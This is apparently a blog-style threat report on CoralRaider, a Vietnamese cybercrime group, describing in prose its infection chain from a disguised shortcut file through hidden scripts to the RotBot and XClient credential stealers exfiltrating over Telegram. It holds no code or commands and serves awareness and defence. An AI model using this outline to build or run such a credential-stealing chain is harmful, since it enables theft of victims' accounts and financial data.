There’s a new kid named CoralRaider in the block of Vietnamese cyber criminals. These cyber attackers have targeted Asian organizations and brands with the aim of gaining access to social media account details and sensitive user data. The specialty of CoralRaider lies in seamless data extraction through legitimate services and social engineering tactics.
Vietnam and Its Close Ties With Cybercrimes!
2023 has been a bad year for the Vietnamese people in terms of cybersecurity. In the first half of 2023 itself, 6000+ cyber attacks had been registered within the Asian country. Before 2023 ended, the total number of cyber-attacks reached a whopping 13,900 incidents.
As per the Vietnam National Cyber Security Technology Company, the country witnessed a spike of about 9.5% in cyber attacks in the year 2023. A total of 554 websites were attacked by threat actors, out of which around 212 were compromised at Vietnamese government offices. The Vietnamese government has been highly concerned about the sudden surge in cyber crimes across the country and has declared them a direct threat to national security.
More On CoralRaider
CoralRaider made its first official entry in 2023. Considerably a newcomer, the cybercrime group has also been under the radar because of its rookie mistakes. For instance, once they ended up infecting their own systems, thereby exposing their schemes and pursuits.
CoralRaider’s ultimate goal in this latest cyber attack is monetary gain. They are trying hard to gain access to social media and advertising accounts so that they can enjoy illegitimate financial benefits. Cyber experts also doubt follow-on attacks in the form of malware delivery.
Image sourced from slideshare.net
Unlike some other cyber criminals in Vietnam, CoralRaider does not seem to have a nationalist agenda. As of now, it is purely focused on profit motives.
Step-By-Step Analysis Of CoralRaider Infection Chain
- The easiest way to identify a CoralRaid campaign is a Windows shortcut (.LNK) file. They generally use a PDF extension.
- When a naive user clicks on the supposedly harmless Windows shortcut, it connects the user to a malicious server controlled by CoralRaider and further downloads a file.
- This downloaded file is in the form of an HTML application (HTA) and looks like a harmless webpage. However, a script is hidden on this web page. Cyber attackers use Visual Basic to write these hidden scripts.
- Soon, the Visual Basic script gets activated. It instructs the computer to perform certain tasks. All of these happen in a behind-the-scene manner to which the user stays oblivious.
- Next, the Visual Basic script starts another set of instructions by leveraging a language called PowerShell. Through these instructions, they check whether or not the computer is under the surveillance of security experts. Apart from this, they also try to dissect the security system (if any) and bypass it so as to gain access to the controls of the system. Also, they ensure that the user does not get any notification regarding these malicious activities.
- Finally, they execute a program named RotBot. It is specially designed to extract data sneakily from the computer without the user’s awareness. RotBot not only specializes in evading security measures but also has the expertise to collect specific data as per the instructions.
- RotBot sneakily downloads a program called XClient, which effectively collects sensitive private data, such as passwords, usernames, email ID etc., from the device. The Program is also capable of stealing other important details such as credit card account data, financial information and browser history. Also, the malicious program secretly screenshots the victim’s desktop and uploads it as well.
In short, this will feel like a private detective who sneaks into your home through your backdoor and leaves behind multiple spy cams at your place to gather all your personal data.
Noob Behavior By CoralRaider
CoralRaider generally uses Telegram to exfiltrate victim data and as a command-and-control channel. But somehow they managed to infect one of their own systems as the screenshots of their device screen is available in Telegram itself.
The screenshots divulged lots of details such as CoralRaider hackers chatting in Vietnamese language. Basically, CoralRaider extracts data from user’s systems and sell them out in secret markets through different chat groups in the Telegram app.
Cyber Scenario in Vietnam
Earlier, Vietnam was not on the radar of cybercriminals. However, in recent times, Vietnam has embraced rapid cyber advancements. With this, the country has become vulnerable to more and more cyber attacks. Also, poor economic conditions and lack of job opportunities further force the natives to partake in illegitimate activities. Cybercrime, as compared to skill-based jobs, brings in a great deal of money in a short span of time. That’s where more and more people get lured into the dark world of cybercrimes.
At present, concerned authorities are taking suitable measures to prevent further damage by CoralRaiders. However, it’s imperative to prioritize both phishing protection software and comprehensive phishing awareness training to fortify against future cyber threats.